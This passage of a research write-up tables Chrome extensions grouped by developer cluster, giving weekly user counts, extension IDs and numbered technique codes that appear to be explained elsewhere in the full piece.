Shopee Images Downloader 966 idnackiimdohbfkpcpoakocfkbenhpdf 2
Yellow Pages Scraper 2,000 iijgmfjjmcifekbfiknmefbkgbolonac 1, 2
Booking Images Downloader 27 ilcbmjpkggalcdabgpjacepgmkpnnooh 1, 2
Likes Exporter for Ins 126 jdfpnhobcnlokhaoihecmgmcnpjnhbmm 1, 2
Job Scraper for LinkedIn™ 1,000 jhmlphenakpfjkieogpinommlgjdjnhb 2
Wayfair Reviews Extractor 186 jjmejjopnabkbaojcijnfencoejjaikb 1, 2
XExporter - Export Twitter Followers 908 kfopfmdjhlpocbhhddjmhhboigepfpkg 1, 2
Costco Reviews Extractor 31 lbihigmoeinmajbmkbibikknphemncdl 1, 2
Pinterest Images Downloader - Pinterest Video Downloader 2,000 lephhdmcccfalhjdfpgilpekldmcahbb 1, 2
Shein to Woo CSV Exportor 66 lhjakenfnakjjfgfcoojdeblfmbpkocf 1, 2
Image & Video Downloader for Ins 358 ljgaknjbenmacaijcnampmhlealmbekk 2
Comments Exporter 307 llcgplklkdgffjmhlidafnajbhbohgen 1, 2
Yelp Reviews Extractor 59 mnmjkjlaepijnbgapohecanhklhoojbh 1, 2
TKCommentExport - Export TikTok Comments 1,000 monfhkhegpjfhcmjaklhnckkhlalnoml 1, 2
Chats Backup for wa 1,000 najkpicijahenooojdcnfdfncbaidcei 2
Slack™ Member Extractor 497 nbhjfblpkhiaiebipjcleioihpcclaea 1, 2
Glassdoor Scraper 387 ndnomcanokhgenflbdnkfjnhaioogmdk 1, 2
Maps Scraper & Leads Extractor 646 nhefjmaiappfgfcagoimkgmaanbimphd 1, 2
Followers Exporter for Thread 174 nhlcgpbandlddfdmabpjinolcgfbmkac 2
Bulk Barcode Generator 105 odipjjckdnfbhnnkdacknhpojbabaocb 1, 2
Followers Tracker for Ins 7,000 ohfgngkhbafacegaaphcinpgmnmjknff 1, 2
Airbnb Scraper 124 ohgfipogdmabijekgblippmcbfhncjgn 2
TripAdvisor® Review Scraper 1,000 pkbfojcocjkdhlcicpanllbeokhajlme 2
Bulk QR Code Generator 154 pnmchlmkjhphkjnbjehfgdagonbjpipg 1, 2

Lazytech

Name Weekly active users Extension ID Approaches
Twitter Comment Export Tool 1,000 ajigebgoglcjjjkleiiomgbogggihibe 1, 2
AliExpress Images Downloader 1,000 ajnfoalglmknolmaaipgelpbdpcopjci 1, 2
Slack Translator Pro 475 ajoplaibmnoheaigdnfbagfchnnjkicc 1, 2
Whatsapp Translator Pro 2,000 bnbighhfhbnkoinbakcadadhjhjhnogo 1, 2
Discord Translator Pro 2,000 bpgmpnpdklkcdgiemflkhfhbcibbimhh 1, 2
Threads Followers Exporter 447 cackmcfbjdjnicnoifjcbpbidfnodfid 1, 2
Telegram™ Translator - Immersive Translation 1,000 cadnjdgggbmgmiokgmbngklhlldabhom 1, 2
Twitter Auto Unfollow Tool 1,000 cdejkfmlkpdipdjlookbmifhlihdefld 1, 2
FB Group Export Tool 1,000 cfkelnkpomgldoeoadoghdjcejdknilb 1, 2
Etsy Images Downloader 367 clcjlefnlochgjgmhkkmggojbcckloel 1, 2
Snapchat Translator Pro 58 degekmdjhceighgpmeociiolpbpdfmkk 1, 2
Skype Translator Pro 30 dheinobepcdickihlphioifoadnnlddn 1, 2
YouTube™ Comment Translator Pro 2,000 dkleeapinhlpifbijbppjcbgiolpagjd 1, 2
IG Followers Exporter 2,000 dncpodlbhbfeckciihiifmfpepleaked 1
Contact Saver for WhatsApp 2,000 dnoeodfoipnecbnnjhgoopnheicjlemm 1, 2
FB Messenger™ Translator - Immersive Translation 1,000 eeagfonlpjdegifbbipcnbhljledonnc 1, 2
Twitter AutoFollow Pro 1,000 elnglbaphfoebenjdbkalpgghijpnklp 1, 2
IG Auto Liker 1,000 fajlpeonkickmgcbmpnmdofghngjphac 1, 2
IG Auto Unfollow 1,000 fcapaeipdkdbongbphfbccnegbcbilah 1, 2
Indeed Scraper 44 fedomnahgimendnjeifhhgehimjidnof 1, 2
Lazada Images Downloader 1,000 fgefgonmnflpghpipmaajgagfekcdljp 1, 2
IG HashTag Export Tool 1,000 gddkmjkdanijaiogljcfnhaolephjfcj 1, 2
FB Messenger Translator Pro 1,000 gfmklfdiaiefelfoklndfcchmdopjcke 1, 2
TG Downloader - Photos, Videos, Audios 1,000 gihehopmfgnaknmbabddbkkebbaopeee 1, 2
Bumble Swipe Bot - Auto Filter & Swipe 955 gikinafmdccpecjbmnbjkeiadcabffpb 1, 2
Twitter Followers Exporter 1,000 giplfbjnmilhalcaehoblaegpkgembpi 1
Twitch Translator Pro 1,000 gmaglilejboehglachimajmepgjckjng 1, 2
Shein Images Downloader 1,000 hamgafmfcmaipelffjbdgikejedlnbmm 1, 2
eBay Images Downloader 1,000 hedppplfdackfbdjienfgbmecbnldijl 1, 2
IGEmail - Instagram Email Scraper 1,000 hgonoojgigfaikonjkhchoklgjoiphio 1, 2
Twitter Follower Export Tool - Export Followers / Following 1,000 hncbinceehncflccpnanfdnbinhjlleh 1, 2
IGFollower - IG Follower Export Tool 2,000 iindafjcdjddenmiacdelomccfblfllm 1, 2
FB Comments Export Tool 1,000 inooeahlmjlhjdblojocgcoohmpjbhif 1, 2
IG Auto Follower - Auto Follow / Unfollow 1,000 ipmahbofhgomnebimjlocmemobaamnfp 1, 2
Apollo Exporter 867 joainhjiflchdkpmfadbencgeedodiib 1, 2
Temu Images Downloader 1,000 jonloekipbhbjfcdpicecchjhhoidncn 1, 2
TikTok Follower Export Tool 1,000 kcoglbpmmjallcceanhiafgdlhofocml 1, 2
Twitter Comments Exporter 1,000 kdcgillnpmlfacikljeafiikgcpdjiha 1
IG Growth Pro - Auto Follow & Unfollow 2,000 kdibmenfbafnmjineglfmlbnmckhceej 1
Telegram Translator Pro 1,000 kkafjojibijigkcpgiidnphfnhdnopnf 1, 2
Twitter Auto Unfollow 1,000 lfofoljipingdgmjdmleonbnkecfbjli 1
Discord Chat Export Tool 1,000 lmoceiadfbnpofjbmgemloenlfkhhbhl 1, 2
Amazon Images Downloader 1,000 mjkalljfgchhnjekdgkennpimdobfjfa 1, 2
Twitter Auto Follower - Auto Follow / Unfollow 1,000 mmaekkgncaflnfaimjaefjohpgneagnh 1, 2
Twitch™ Translator - Immersive Translation 1,000 ndjfdohpdlajffmmhdlifafoihibnokb 1, 2
Discord™ Translator - Immersive Translation 1,000 nenhidhfpjbccpbikiceenfnchkhljmd 1, 2
IG Comment Export Tool 1,000 ngigmhodcdcjohafngokbkmleidkigfn 1, 2
IG Comments Exporter 1,000 nogopabibhapbfcnlfeandndkalcjkik 1
Slack™ Translate 253 ogeieigjomecilgfebkdbgdckfpbjfah 1, 2
IGEmail - Email Extractor and Scraper for Ins 1,000 ohhcmiegflabbcfihgjkkndpgijmpghk 1
IG Auto Like Tool 1,000 ohocmgfknbibgiiijhokjifkhpgpahbb 1, 2
IG HashTags Exporter 1,000 pgbenbeencahnighlkhingagogpjjdbh 1, 2
Whatsapp™ Translator - Immersive Translation 1,000 phafeggjhdhfcmlanhmgbmcbgocapnik 1, 2
TikTok Comment Export Tool 1,000 pjjldehmkcnmmkldjielbonlnmbkomlm 1, 2
IG Unfollow Pro 1,000 pmlkkhcpimkhgalapkfpiknklhalkoeo 1
Tinder Swipe Bot - Auto Filter & Swipe 644 poocdjijjpnkcmhjecpeicdhljbmgddc 1, 2

Yue Apps

Name Weekly active users Extension ID Approaches
Etsy Images Downloader 115 aakfimfbjikfkfeokmamllkomlejnpdi 1, 2
Export Twitter Follower 1,000 amflfbkcoeanhfcdcbebeimpjnoebakn 1, 2
Export TikTok Followers 378 bdhcflkeglekljebdpanedpgeojpfefj 1, 2
IG Auto Follow 19 cpfdfhmnheohcfiddlpjgjjdhgmnnali 1
Twitter Unfollower 536 eilkgadngbcjchnpmndgafhaihmohfho 1, 2
Twitter Auto Follow-Unfollow 447 fmkhphcddlhkmggaldkibecjmgpkbpdl 1, 2
Shein Scraper 26 gpbhomcniappgbcehfedaliofagbfado 1, 2
IG Auto Like 1,000 hmgfjlghckknhafggpnnniffdiggdmpd 1, 2
IG Follower Export Tool 3,000 iacchdhbljnmihoeeelcgljnajfafpkh 1, 2
IG Auto Follow 928 icjfkeibgfjfkdfjjgafpkpfplpnbidc 2
Contacts Exporter for WhatsApp 28 ifhjahdgkdcpeofnamflcpdkadijbifl 1
IG Auto Follow 5,000 iiaohnpoogjkomcdkhdfljgpglejpaad 1, 2
Shein Images Downloader 1,000 lphjpapkpnhhffgobpekcmeanpompeka 1, 2
IG Auto Unfollow 77 mpmpkpbmimeinhimdkbcecbbmgcacndp 1, 2
TwExport - Export Tweets From Any Account 972 nahaggbplpekgcbbnemjlpnnmpmhnfkh 1, 2
Export Group Members for Facebook 40 oakdlcfhapgllacidemajdmmdcjfbiig 2
Unfollowers Pro 3,000 onkeebndjchpacfplcfojadeedlfdime 1, 2, 7
Export Tweet From Any Account 167 opbkmlokpjccgjmffhpndbjahhkbnhon 1

Chrome Extension Hub

Name Weekly active users Extension ID Approaches
TG Sender - telegram messages bulk sender 462 baghjmiifdlhbnfiddfkoomfkhmiamle 1, 2
IGEmail - Email Extractor and Scraper 1,000 cnjelbflcpdehnljcmgolcbccfhgffbn 1
Ins Comment Bot - instagram automated comment bot 22 dlfigaihoneadjnenjkikkfehnpgbepo 1, 2
IGFollow - Follower Export Tool 546 efjeeadgcomeboceoedbfnnojodaonhj 1, 2
IGCommentsExport - Export Comment for IG 39 fahielldgamgakbecenbenagcekhccoj 1
Unsubscriby for Youtube 42 gcmfheliiklfcjlbnmeahfhmcbjglncl 1, 2
Airbnb Scraper 32 ioblhofpjfjbfffbibgkjiccljoplikf 1, 2
TG Downloader - Telegram Video Download 2,000 kockkcmeepajnplekamhbkgjomppgdhp 1, 2
IGPost - Export Instagram photos and videos 70 mdhgjlmpioeeainbfmodgcaajgchapnm 1, 2

Infwiz

Name Weekly active users Extension ID Approaches
WAAutoReply - Web Automatic Reply Assistant 47 bilbhjhphaepddlmheloebigdkafebmg 1, 2
Reaction Exporter - Extract Like, Love, etc. 168 cddgoecgoedcodpohjphbhfdhojlpfik 1, 2
WAChecker - Check, Verify & Filter Number 3,000 cmelkcfmckopkllanachmbnlfpkhnjal 1, 2
IGGrowth - auto follow and unfollow 1,000 eggdbehenjijmhlbiedecgkehgeilemo 1, 2
IGCommentsExport - Export Comment for IG 5,000 ejneclajijjhnnelphnggambomegmcpd 1
Jobs Scraper for Indeed 16 fbncpljgpiokofpgcedbfmbnpdmaofpj 2
Job Scraper for LinkedIn™ 64 hhddcmpnadjmcfokollldgfcmfemckof 1, 2
Social Profile Info - User Info Lookup From URLs & IDs 47 jcmhjgllmdnlfabkppegglnmkmlheopp 1, 2
Chewy Reviews Scraper - Images 8 jhgpmldoffheafnogmaihhgjpoecmgea 1, 2
Comment Exporter - Extract Comments 866 knpbmoflfeeokanhpkiofaoaohpgfbjh 1, 2
Message Sender - Web Sender 7,000 ldhmkpfefdgmbgmmcldnnjokfjjnldmf 1
Download Group Phone Numbers 8,000 mhlmhjlkpioopoipgbmcmiblopmmecjc 1
Friend Exporter - Extract friends list 993 ncekbecnpnoiapeghdneaihmeokakpdp 1, 2
Zillow Scraper - Extract Data from Zillow 2,000 nlieamdebnjhijflpbkbaijnjpdpieoh 1, 2
Friend Requests Sender 201 padhkflcigakphahffhcgfnfiddimngo 1, 2
IGFollow - Follower Export Tool 100,000 pkafmmmfdgphkffldekomeaofhgickcg 1, 2

NioMaker

Name Weekly active users Extension ID Approaches
Friend Requests Sender 113 bgdjlbjaemhokfkkjiplclhjjbmlhlof 1, 2
Lead Exporter for Apollo 2,000 fhlfdnhddefmfmmehofnbnkmcbgdlohn 1
Yelp Scraper: Scrape Yelp business data 46 fnoknmcjgfgepgngbkeefjgeikbdenki 1, 2
Followers Everywhere for LinkedIn™️ 38 kdopjbndoijfnnfijfkfponmllfomibn 1

FreeBusinessApps

Name Weekly active users Extension ID Approaches
Twitch Chat for Full Screen 4,000 bgopmpphpeghjpififijeoaojmmaiibh 6
Free Time Clock for Google Chrome™ 3,000 bhcdneenlaehgbonacefkpjddbomfpkj 6
SQLite Viewer 9,000 bpedjnknnoaegoaejefbodcdjmjkbbea 5
ESports Tournament Schedule 111 caocacliklpndkcbdcbfcjnelfaknioi 6
Volume Booster 1,000 cejhlkhieeooenehcfmcfgpcfjdhpkop 1, 2
Sketchpad for Google Chrome 7,000 dbhokcpgjhfjemonpglekkbmmjnkmolf 6
Audio Equalizer for Youtube™ 20,000 dcjnokfichnijppmkbgpafmdjghibike 1
Notepad - Take Notes And Weekly Planner 10,000 dfiojogmkjifkcckhabcedniponnmifp 6
Rubiks Cube for Google Chrome 9,000 dlabgdldanmcjlmnifgogbnffionmfki 6
CSS Selector 10,000 dobcgekgcmhjmfahepgbpmiaejlpaalc 6
Icon Finder 1,000 eblcidnbagkebkmakplgppmgecigpaef 5
Enable JavaScript 10,000 egljjlhdimceghlkloddalnlpgdgkboj 6
Page Marker for Google Chrome™ 6,000 ejfomipinjkencnfaaefmhgkipphodnc 6
Customized Scrollbar 977 elchgoiagofdppjcljnecjmekkkgjhhi 6
Compress Video Files 10,000 gbffnccbjahakeeailfjmdbhnccklcgp 6
Password Generator 4,000 gbgffmpdbclmicnofpdbdmmikppclhmf 6
Speaker Booster 8,000 gkfjamnmcjpbphincgfnagopcddfeakd 1
Fast Search for Google Drive™ 443 glhpjfhpachnbgipcookemmoocedfjgp 6
Dark Mode for Messenger 273 hajjeoobbdpmbicdnkpoggllfebkmbfb 6
Earth 3D View Map 8,000 hfnflfnjflibmhoopdbndehehbhgjcem 6
Reactions for Google Meet 40,000 hicfolagolebmjahkldfohbmphcoddoh 6
Date Time 7,000 hjiajhckbofggdeopalpnpmapekkjcmi 6
Image Editor 10,000 hpiicbccakkjfojofhjcjhbljnafdfbg 4
Picture in Picture for Videos 20,000 icmpjbkbjlbfpimllboiokakocdgfijb 6
Mute Tabs 2,000 ijidbphagpacfpkhgcjfbdjohkceanea 6
Copy To Clipboard 8,000 imjkddkepakidnmolhmpfldheaiakojj 6
Tab manager 3,000 iofngkkljgebpllggmdpcldpifhdckkg 6
Online Radio for Google Chrome™ 4,000 jlfegkfcihbbpiegahcpjjidojbhfglo 6
Custom Dark Mode 3.0 for Youtube, Facebook 795 jpgkbhploimngoikjnmggchkcekleehi 1, 2
Make Text Readable for Google Chrome™ 1,000 kicekkepbmfbaiagdcflfghmnnachmdg 6
Online Download Manager 10,000 kilhigaineblocfbpikplhgaacgigfnb 6
Gmail Adblocker 1,000 kkddllkaglcicbicjlobbhmjjangamjh 5
Testing Reading Speed 4,000 kmkdgnfgallnjpdldcmplbggbmkgcgdl 6
User Agent Switcher 1,000 lbdmdckajccnmklminnmlcabkilmhfel 5
Highlighter for Google Chrome™ 50,000 lebapnohkilocjiocfcaljckcdoaciae 6
Free Spell Checker for Google Chrome™ 20,000 ljgdcokhgjdpghmhdkbolccfcfdbklpo 6
IMDB Ratings on Netflix 314 lkfapihkchheoddiodedjlapfdnmgkio 6
Adjust Screen Brightness for Browser 5,000 lkomnldkbflfbkebenomadllalainpec 6
Timer for Google Meet 10,000 lmkdehdoopeeffkakbbkfcmmhmeoakpk 6
Make Screenshot for Chrome™ 1,000 mhnppmochppgeilojkicdoghhgfnaaig 1
Full Page Screenshot for Google Chrome™ 10,000 mieibeigpaehbjcbibakjcmkocngijjl 6
Custom Progress Bar for YouTube™ 300,000 nbkomboflhdlliegkaiepilnfmophgfg 6
Chrome Bookmarks 4,000 nhcaihbjbbggebncffmeemegdmkamppc 6
Tab Snooze 336 nomolokefbokmolefakehdnicdpjbmnm 5
History & Cache Cleaner 10,000 oiecpgbfcchalgdchgoplichofjadhmk 5
View Chrome History 40,000 oiginoblioefjckppeefcofmkkhgbdfc 6
Meme Maker for Google Chrome 2,000 oipbnbggobjonpojbcegcccfombkfoek 6
Bass Boost for Google Chrome™ 20,000 omobmjpbljcbgdppgjfmmennpjpgokch 6
Knit Patterns 181 pfeenapookpacnhhakoilppnmbohncml 6
Tic Tac Toe 3,000 pfghhddjhifjcneopigibnkifacchpgh 6
Clear History & Web Cache 3,000 pjhgdolnnlcjdngllidooanllmcagopf 6
Citation Manager for Google Chrome™ 20,000 pkbcbgfocajmfmpmecphcfilelckmegj 6
Full screen your Videos 3,000 pkoeokeehkjghkjghoflddedkjnheibp 6
iCloud Dashboard 10,000 pnncnbibokgjfkolhbodadgcajeiookc 6
Responsive Tester 30,000 ppbjpbekhmnekpphljbmeafemfiolbki 6

Everything else

Most extensions listed below either belong to one of the clusters above but haven’t been attributed, or the cluster they belong to wasn’t important enough to be listed separately. In a few cases these could however be extensions by individual developers who went overboard with search engine optimization.

Name Weekly active users Extension ID Approaches
Simple = Select + Search 20,000 aagminaekdpcfimcbhknlgjmpnnnmooo 6
AI Chat Bot 1,000 abagkbkmdgomndiimhnejommgphodgpl 1
ChatGPT Translate 20,000 acaeafediijmccnjlokgcdiojiljfpbe 1
The AllChat - ChatGPT, WhatsApp, Messenger 1,000 adipcpcnjgifgnkofmnkdbebgpoamobf 1, 4
save ChatGPT history to evernote 1,000 afcodckncacgaggagndhcnmbmeofppok 3
Sound Booster 1,000 ahhoaokgolapmhoeojcfbgpfknpmlcaj 1, 2, 4
Dictionary - Synonyms, Definition, Translator 40,000 ahjhlnckcgnoikkfkfnkbfengklhglpg 1, 3, 4
ContentBlockHelper 20,000 ahnpejopbfnjicblkhclaaefhblgkfpd 6
Video Speed Controller 250 aiiiiipaehnjdjgokjencohlidnopjgd 4
Black Jack Play Game 20,000 akclccfjblcngnchpgekhijggnibifla 5
Free VPN - 1VPN 600,000 akcocjjpkmlniicdeemdceeajlmoabhg 1, 3, 5
Browser Boost - Extra Tools for Chrome 80,000 akknpgblpchaoebdoiojonnahhnfgnem 5
Comet - Reddit Comments on YouTube & Webpages 9,000 amlfbbehleledmbphnielafhieceggal 1, 2, 5
Hololive Wallpaper 2,000 anjmcaelnnfglaikhmfogjlppgmoipld 6
Roblox Wallpaper 9,000 ankmhnbjbelldifhhpfajidadjcammkg 5
Video Downloader Global - videos & streams 20,000 baajncdfffcpahjjmhhnhflmbelpbpli 1, 2
super cowboy play game 472 bconhanflbpldbpagecadkknihjmlail 5
Paint Tool for Web 3,000 bcpakobpeakicilokjlkdjhhcbepdmof 5
Sound booster by AudioMax 900,000 bdbedpgdcnjmnccdappdddadbcdichio 1, 2, 4
Save to Face Book. From web to Saved FB 63 bdhnoaejmcmegonoagjjomifeknmncnb 1, 2, 6, 7
Save ChatGPT to Obsidian markdown file 641 bdkpamdmcgamabdeaeehfmaiaejcdfko 7
Full Page Screenshot: ScreenTool.io 6,000 bfhiekdkiilhblilanjoplmoocmbeepj 1, 5
Downloader for Instagram - ToolMaster 100,000 bgbclojjlpkimdhhdhbmbgpkaenfmkoe 1, 2
Aqua VPN 20,000 bgcmndidjhfimbbocplkapiaaokhlcac 1, 2, 3, 4, 7
ChatGPT Assistant - Smart Search 178 bgejafhieobnfpjlpcjjggoboebonfcg 1, 2, 4, 7
Xiaojinshu - Xiaohongshu material downloader (video, picture) 2,000 bhmbklgihbfcpbnaidlcanmbekbjoopg 1
Save ChatGPT to Notion 5,000 bknieejaaomeegoflpgcckagimnbbgdp 3
Football Wallpapers 1,000 blaajilgooofbbpfhdicinfblmefiomn 6
Image downloader - picture and photos saver 500,000 cbnhnlbagkabdnaoedjdfpbfmkcofbcl 1, 2, 4, 6
IG Follower Export Tool - IG Email Extractor 1,000 cekalgbbmdhecljbanbdailpkbndbbgj 1, 2
Happy Chef Bubble Game 668 celnnbmadnnifmnaekgeiipiadahpide 5
midjourney to notion 1,000 ceoifmkmbigkoodehbhfeegbngoomiae 3, 4
Dragon Ball Z Wallpaper 10,000 cepfoomofdcijdlpinanbciebkdmmddm 5
Change Default Search Engine 7,000 cfikbclbljhmmokgdokgjhnpinnmihkp 5
Indeed Scraper 425 cgelphinochnndbeinkgdjolojgdkabc 1
Story Space. Anonymous viewer for IG and FB 10,000 cicohiknlppcipjbfpoghjbncojncjgb 1, 2
Classic Dark Theme for Web 700,000 ckamlnkimkfbbkgkdendoedekcmbpmde 1, 2, 4
ai platform 687 cklkofkblkhoafccongdmdpeocoeaeof 1
AI Art Generator 697 cllklgffiifegpgbpaemekbkgehbeigh 6
Twitter Algorithm Rank Validator - Free Tool 31 cmgfmepnimobbicpnjhfojjibhjdoggo 1
Adblock - adblocker for Youtube 700,000 cohnbaldpeopekjhfifpfpoagfkhdmeo 1, 2, 3, 7
Bass Booster - Сontrol your sound 800,000 coobjpohmllnkflglnolcoemhmdihbjd 1, 2, 4, 6
SearchGPT Powered 30,000 cpmokfkkipanocncbblbdohjginmpdjn 1, 2
Maps Scraper & Leads Data Extractor 800 dahoicbehnalbeamhcpghhoelifghbma 6
Wasup WA Sender 4,000 dcmcongoliejhianllkdefemgiljjdjl 5
Popup Blocker - Adblock Pop up 10,000 ddbjkeokchfmmigaifbkeodfkggofelm 1, 2, 3, 4
AI Avatar Generator 528 ddjeklfcccppoklkbojmidlbcfookong 6
Telegram Video Downloader 10,000 ddkogamcapjjcjpeapeagfklmaodgagk 1, 2
GetJam - find Coupons and Promo codes 10,000 deamobbcdpcfhkiepmjicnlheiaalbbe 1, 2, 3, 7
WiFi speedtest & Internet Connection Test 10,000 deofojifdhnbpkhfpjpnjdplfallmnbf 1, 2, 4
Audio Master mini 900,000 dfffkbbackkpgmddopaeohbdgfckogdn 1, 2, 4
Geometry Dash Wallpaper 1,000 dghokgbfkiebbjhilmjmpiafllplnbok 5
ExportShopify 63 dgofifcdecfijocmjmdhiiabmocddleb 5
Bass Booster Lite 1,000 dhempgjfckmjiblbkandmablebffigdj 1, 2, 4
IG Follower Export Tool - Export Follower List Instagram - IG Tools 343 dhmgjkbkpjikopbkgagkldnoikomgglo 1, 2
Custom Youtube 64 dieglohbkhiggnejegkcfcpolnblodfj 1, 2
Math AI 10,000 dioapkekjoidbacpmfpnphhlobnneadd 1, 2, 7
Batch Save ChatGPT to Notion 176 djefhicmpbpmmlagbgooepmbobdhajgn 7
Night Theme for Web 786 djkdplhjjhmonmiihoaipopjfjalelkb 1, 2, 4
TickerIQ 200,000 dlaajbpfmppphhflganljdalclmcockl 1, 2, 4
Screen Recording 10,000 dlcelhclgobpnegajplgemdhegfiglif 1, 4
Retro Video Downloader 3,000 dnbonfnabpogidccioahmeopjhbcojoe 1, 2, 4
View Instagram Stories - InstaStory 288 dpckdamgkbgkhifgpealdkekennmkjln 1
City Bike Racing Champion Game FEEP 471 dpkpeppcigpkhlceinenjkdalhmemljn 5
ChatGPT for WhatsApp 7,000 eacpodndpkokbialnikcedfbpjgkipil 5
Vibn AI - ChatGPT: AI-Powered Browsing 20 ealomadpdijnflpgabddhepkgcjjeiha 2
sync evernote to notion 72 edppbofcdhkllmbbhnocaenejjlcjoga 2, 4, 7
Email Extract Pro - Simplify Lead Generation with Notion 606 eebaoaeanohonldcbkpnjfkdlcbcaond 2, 3, 7
Bass Booster - Sound Master Pro 200,000 eejonihdnoaebiknkcgbjgihkocneico 1, 2, 4
Ever2Notion 148 efolkkdddgjcnnngjefpadglbliccloo 3
Claude to Obsidian 217 ehacefdknbaacgjcikcpkogkocemcdil 1
Auto Tab Saver Pro 14 ehdnfngedccloodopehbfgliancjekhi 1, 3
Tricky Craby Html5 Game 7,000 eifmecggecobbcjofbkkobpbjbdifemc 5
Dark Mode - Dark Reader for Chrome 60,000 eiionlappbmidcpaabhepkipldnopcch 1, 2
Beautiful Nature Pictures Wallpaper 1,000 eilemfgfflhnndcaflanfgmohfjgbgof 6
Email extract 400,000 ejecpjcajdpbjbmlcojcohgenjngflac 1, 2, 4
Screen recorder - Recorder Tool 84 ekgimgflikldcmjmeeecnkdenimhamch 5
Soccer Online Game Football - HTML5 Game 40,000 eknjiacpaibimgjdeldfhepofgjkngck 6
Crazy Cursors - Custom Cursors with Trails 14 enncggclkhfdeoaglhjkieeipkboaecd 1, 3
Lumberjack River Game 1,000 fbgkmgkcneoolclpopjahcdogpbndkcl 5
Vroxy - Spoof Time Zone, Geolocation & Locale 1,000 fcalilbnpkfikdppppppchmkdipibalb 1, 5
Linkedin Job Scraper - scraper.plus 948 fcfbdnejkoelajenklbcndfokempkclk 3
Music Equalizer for Chrome 500,000 fedoeoceggohfajbhbadkfhgckjkieop 1, 2, 4, 6
Safety Web - Adblock for Web 2,000 ffafhlldnfofnegdfhokdaohngdcdaah 4, 5
IG Likes Export 1,000 fiefnmddjghnmdjfedknoggjfcfejllm 2
Free YouTube Comment Finder - EasyComment 1,000 fifgmgcoibgcehfbpeifpipjnmfdjcoi 1, 5
Classic Brick Game 80th 7,000 filjhgipogkkmalceianiopidelcacam 1, 2, 4, 6
IG Follower Export Tool - IG Lead Scraper 48 fimgpffhikpemjcnfloodfdjfhjkoced 5
Instagram Photos Download - InstaPhotos 381 fjccfokbikcaahpgedommonpjadhdmfm 1
Save Twitter&Linkedin People to Notion CRM 61 fjhnpnojmkagocpmdpjpdjfipfcljfib 1, 2, 3
Life HD Wallpapers New Tab 787 flbglpgpbekkajkkolloilfimbaemigj 1
INSORT - Sort Reels for IG 334 fmdndpmffplgenajipolmpfhflmgdpla 5
Indeed Scraper 467 fnmcgefncfbmgeafmdelmjklpblodpnc 1, 2
Grand Commander 1,000 fnpedebmmbanjapadpnoiogjjhnggdca 5
Succubus HD Wallpapers New Tab Theme 126 gahampmajaohlicbcpdienlhclhkdgcg 1, 6
Attack On Titan Live Wallpapers 6,000 gajcknbeimpoockhogknhfobnblpkijk 6
Red And Black Shards 9,000 gamplddolbodndilnmooeilfcmdjkjfn 6
Free VPN Proxy - NoName VPN 1,000 gceoelahanekobagpkcelbhagpoaidij 4, 5
GPT Booster - ChatGPT File Uploader & Chats Saver 9,000 gcimiefinnihjibbembpfblhcmjclklo 1, 2, 6
GPT Sidebar - Search with ChatGPT 900,000 gcmemiedfkhgibnmdljhojmgnoimjpcd 1, 2, 3, 4, 6
IG Reel Download - InsReels 194 gcofmhbhbkmagfcdimaokhnhjfnllbek 1
Chrome Capture - screenshot & GIF 300,000 ggaabchcecdbomdcnbahdfddfikjmphe 4
Audio Equalizer 551 ggcffjkfphpojokoapldgljehpkiccck 1, 2, 4
GPTs Store Search and Favorite GPTs 735 ggelblabecfgdgknhkmeffheclpkjiie 3
League of Legends Wallpaper 1,000 giidhjojcdpaicnidflfmcfcnokgppke 5
Video Downloader Button 9,000 gjpdgbkjopobieebkmihgdoinbkicjck 1, 2, 5
Screen Virtual Keyboard- specific needs tool 9,000 gkiknnlmdgcmhmncldcmmnhhdiakielc 4, 6
Just Video Downloader 5,000 gldhgnbopkibmghhioohhcjcckejfmca 1, 2, 4
Picture in Picture - floating video player 1,000,000 gmehookibnphigonphocphhcepbijeen 1, 2, 4
Sound Booster 10,000 gmpconpjckclhemcaeinfemgpaelkfld 1, 2
Hive - Coupons, Promo Codes, & Discounts 2,000 godkpmhfjjbhcgafplpkaobcmknfebeh 1, 2, 3
Profile Picture Maker - AI PFP Maker 202 gonmpejcopjdndefhgpcigohdgjkjbjc 6
Traffic Car Racing Game 10,000 gpchpdllicocpdbbicbpgckckbkjdago 6
Mass Delete Tweets - Tweet Deleter 1,000 gpeegjjcnpohmbfplpkaiffnheloeggg 1, 5
Microsoft Word Translator - Translate Word online 974 gphocmbdfjkfghmmdcdghoemljoidkgl 3
Better Color Picker - pick any color in Chrome 20,000 gpibachbddnihfkbjcfggbejjgjdijeb 5
Popup and Ads Blocker 20 hadifnjapmphiajmfpfgfhaafafchjgh 1, 2, 3
Sound Equalizer 50,000 hckjoofeeogkcfehlfiojhcademfgigc 1, 2, 4
Multi Ad Blocker Complete for Youtube™ 4,000 hdoblclnafbfgihfnphjhadfpgcmohkp 1
Video Downloader pro 1,000,000 hebjaboacandjnlnhocfikmaghgbfjlp 1, 2, 4
WAFilter - Check & Verify WA Number 5,000 hhfjicmmlbnmbobgpfmdkodfjkibogog 1, 5
Translator - Click to Translate 10,000 hhmocdjpnopefnfaajgfihmpjpibkdcj 1, 2, 3, 4, 5
Funny Tweet Generator 241 hhpmgfhnfdifcjgmgpgfhmnmgpiddgbg 1, 5
Winamp Classic Equalizer 1,000 hibihejapokgbbimeemhclbhheljaahc 1, 4
ChatGPT plugin search 893 hjdhbhggcljjjfenfbdbbhhngmkglpkl 3
ReminderCall Chrome Ext. 287 hlblflbejmlenjnehmmimlopeljbfkea 1, 3
Automatic ChatGPT Translator: Prompt Genie 1,000 hlkbmbkcepacdcimcanmbofgcibjiepm 3
AI Editor For Xiaohongshu™ - XHSPlus 2,000 hmeohemhimcjlegdjloglnkfablbneif 1
Cute Dog Wallpaper HD Custom New Tab 10,000 iaaplcnlmmnknnbhhpedcaiiohdepiok 6
Adblocker for Web 3,000 icegiccppplejifahamjobjmebhaplio 1, 2, 3, 4
Email scraper & Email Extract 73 ichccchniaebdhjehjcpmiicifhccpem 1, 5
Tomba - Email Finder & Email Extractor Plus 9,000 icmjegjggphchjckknoooajmklibccjb 5
Comment Exporter - Export Ins Comments 454 idfcdgofkeadinnejohffdlbobehndlf 1, 2
Get Color Palette from Website 75 idhdojnaebbnjblpgcaneodoihmjpdmo 1
Itachi Live Wallpaper 9,000 ihmlfoinmmfmcdogoellfomkcdofflfj 6
Eclincher 905 iicacnkipifonocigfaehlncdmjdgene 5
QRCodie - QR Code Generator 20 iioddhggceknofnhkdpnklfopkcahbkc 1, 2
Shorts blocker for Youtube 100,000 iiohlajanokhbaimiclmahallbcifcdj 1, 2, 4, 6
App Client for Instagram™ - InLoad 800,000 ikcgnmhndofpnljaijlpjjbbpiamehan 1, 2, 4, 6
